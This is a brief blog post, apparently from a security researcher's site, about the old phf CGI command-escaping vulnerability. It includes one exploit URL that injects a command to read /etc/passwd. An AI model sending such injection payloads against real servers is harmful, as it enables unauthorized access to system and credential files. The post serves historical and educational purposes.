Daniel Roberson

phf vulnerability

0001-01-01

The /cgi-bin/phf vulnerability is a command escaping vulnerability dating back to 1996.

It is trivial to exploit:

hxxp://server/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd

Recent Posts

Linux Persistence: atd

2025-04-01 DFIR CTF linux persistence at atd

Linux Persistence: SSH

2025-03-29 DFIR CTF SSH hardening hunting persistence linux persistence hunting hardening SSH PAM

Linux Hardening: SSH

2025-03-06 DFIR SSH hardening linux hardening SSH PAM

Linux Anti-Forensics: Timestomping

2025-03-05 DFIR linux anti-forensics

Finding Bad with Linux Package Managers

2025-03-03 DFIR linux persistence